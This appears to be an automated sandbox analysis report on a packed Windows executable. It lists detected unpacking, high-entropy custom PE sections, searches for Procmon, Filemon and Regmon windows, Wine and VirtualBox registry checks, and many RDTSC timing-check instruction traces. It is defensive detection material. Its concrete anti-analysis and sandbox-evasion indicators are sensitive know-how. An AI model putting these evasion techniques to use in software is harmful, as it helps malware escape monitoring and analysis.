    Source: file.exeStatic PE information: Raw size of mygwdovz is bigger than: 0x100000 < 0x2bc800

    Data Obfuscation

    barindex
    Detected unpacking (changes PE section rights)
    Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.650000.0.unpack :EW;.rsrc :W;.idata :W;mygwdovz:EW;wmjjbofb:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;mygwdovz:EW;wmjjbofb:EW;.taggant:EW;
    Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
    Source: file.exeStatic PE information: real checksum: 0x2f0949 should be: 0x2f5a61
    Source: file.exeStatic PE information: section name:
    Source: file.exeStatic PE information: section name: .rsrc
    Source: file.exeStatic PE information: section name: .idata
    Source: file.exeStatic PE information: section name: mygwdovz
    Source: file.exeStatic PE information: section name: wmjjbofb
    Source: file.exeStatic PE information: section name: .taggant
    Source: file.exeStatic PE information: section name: entropy: 7.97814646144193

    Boot Survival

    barindex
    Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

    Malware Analysis System Evasion

    barindex
    Tries to detect sandboxes / dynamic malware analysis system (registry check)
    Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
    Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
    Tries to detect virtualization through RDTSC time measurements
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B3E77 second address: 6B3E7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B3E7B second address: 6B3E97 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F713487FC88h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B3E97 second address: 6B3E9C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 840E14 second address: 840E1E instructions: 0x00000000 rdtsc 0x00000002 jo 00007F713487FC76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 840E1E second address: 840E23 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8241FB second address: 824201 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83FEAA second address: 83FEAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83FEAF second address: 83FEB4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 840546 second address: 840555 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 js 00007F71347C49D6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 840555 second address: 840589 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F713487FC88h 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007F713487FC82h 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8406A9 second address: 8406BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 ja 00007F71347C49D6h 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 843575 second address: 8435DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F713487FC89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F713487FC7Bh 0x0000000f nop 0x00000010 mov esi, dword ptr [ebp+122D3CF7h] 0x00000016 push 00000000h 0x00000018 call 00007F713487FC79h 0x0000001d jmp 00007F713487FC7Dh 0x00000022 push eax 0x00000023 je 00007F713487FC85h 0x00000029 jmp 00007F713487FC7Fh 0x0000002e mov eax, dword ptr [esp+04h] 0x00000032 push eax 0x00000033 pushad 0x00000034 pushad 0x00000035 popad 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8435DD second address: 8435F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F71347C49DBh 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 843766 second address: 8437C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 add dword ptr [esp], 32351D36h 0x0000000e push ecx 0x0000000f jmp 00007F713487FC7Ch 0x00000014 pop edx 0x00000015 push 00000003h 0x00000017 mov edi, dword ptr [ebp+122D3D7Fh] 0x0000001d push 00000000h 0x0000001f mov esi, edx 0x00000021 push 00000003h 0x00000023 movsx edx, di 0x00000026 call 00007F713487FC79h 0x0000002b pushad 0x0000002c jp 00007F713487FC8Eh 0x00000032 jmp 00007F713487FC88h 0x00000037 pushad 0x00000038 push eax 0x00000039 pop eax 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8437C0 second address: 8437D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jg 00007F71347C49D6h 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8437D1 second address: 8437D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8437D5 second address: 8437DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8437DB second address: 8437E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F713487FC7Ah 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8437E9 second address: 843882 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jmp 00007F71347C49E9h 0x00000011 mov eax, dword ptr [eax] 0x00000013 jl 00007F71347C49F4h 0x00000019 jp 00007F71347C49EEh 0x0000001f jmp 00007F71347C49E8h 0x00000024 mov dword ptr [esp+04h], eax 0x00000028 jmp 00007F71347C49E6h 0x0000002d pop eax 0x0000002e mov edi, dword ptr [ebp+122D3BCFh] 0x00000034 lea ebx, dword ptr [ebp+124634A4h] 0x0000003a push 00000000h 0x0000003c push edi 0x0000003d call 00007F71347C49D8h 0x00000042 pop edi 0x00000043 mov dword ptr [esp+04h], edi 0x00000047 add dword ptr [esp+04h], 00000018h 0x0000004f inc edi 0x00000050 push edi 0x00000051 ret 0x00000052 pop edi 0x00000053 ret 0x00000054 push eax 0x00000055 push eax 0x00000056 push edx 0x00000057 push eax 0x00000058 push esi 0x00000059 pop esi 0x0000005a pop eax 0x0000005b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 843882 second address: 84388C instructions: 0x00000000 rdtsc 0x00000002 jl 00007F713487FC7Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 843A3B second address: 843A40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8554CE second address: 8554D3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8644AE second address: 8644BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F71347C49D6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8644BA second address: 8644CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jns 00007F713487FC7Eh 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8644CD second address: 8644EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F71347C49E6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8624FB second address: 862505 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 862656 second address: 862670 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F71347C49E6h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 862670 second address: 86267E instructions: 0x00000000 rdtsc 0x00000002 js 00007F713487FC76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86267E second address: 862688 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F71347C49D6h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 862912 second address: 862918 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 862918 second address: 86291C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86291C second address: 862922 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 862A64 second address: 862A6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8633CB second address: 8633D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86351B second address: 863520 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 863DB5 second address: 863DC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 857A3C second address: 857A57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F71347C49E3h 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 864352 second address: 864356 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 864356 second address: 864375 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F71347C49E9h 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 864375 second address: 86437F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86437F second address: 864383 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86D561 second address: 86D565 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86D69F second address: 86D6A9 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F71347C49D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 872123 second address: 87212C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87177A second address: 87177E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8728FA second address: 87294A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e pushad 0x0000000f jg 00007F713487FC78h 0x00000015 push edx 0x00000016 pop edx 0x00000017 jmp 00007F713487FC82h 0x0000001c popad 0x0000001d mov eax, dword ptr [eax] 0x0000001f jo 00007F713487FC82h 0x00000025 jmp 00007F713487FC7Ch 0x0000002a mov dword ptr [esp+04h], eax 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007F713487FC7Ch 0x00000035 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 872C5C second address: 872C62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87349C second address: 8734A6 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F713487FC76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8734A6 second address: 8734B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F71347C49D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8748AA second address: 8748B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
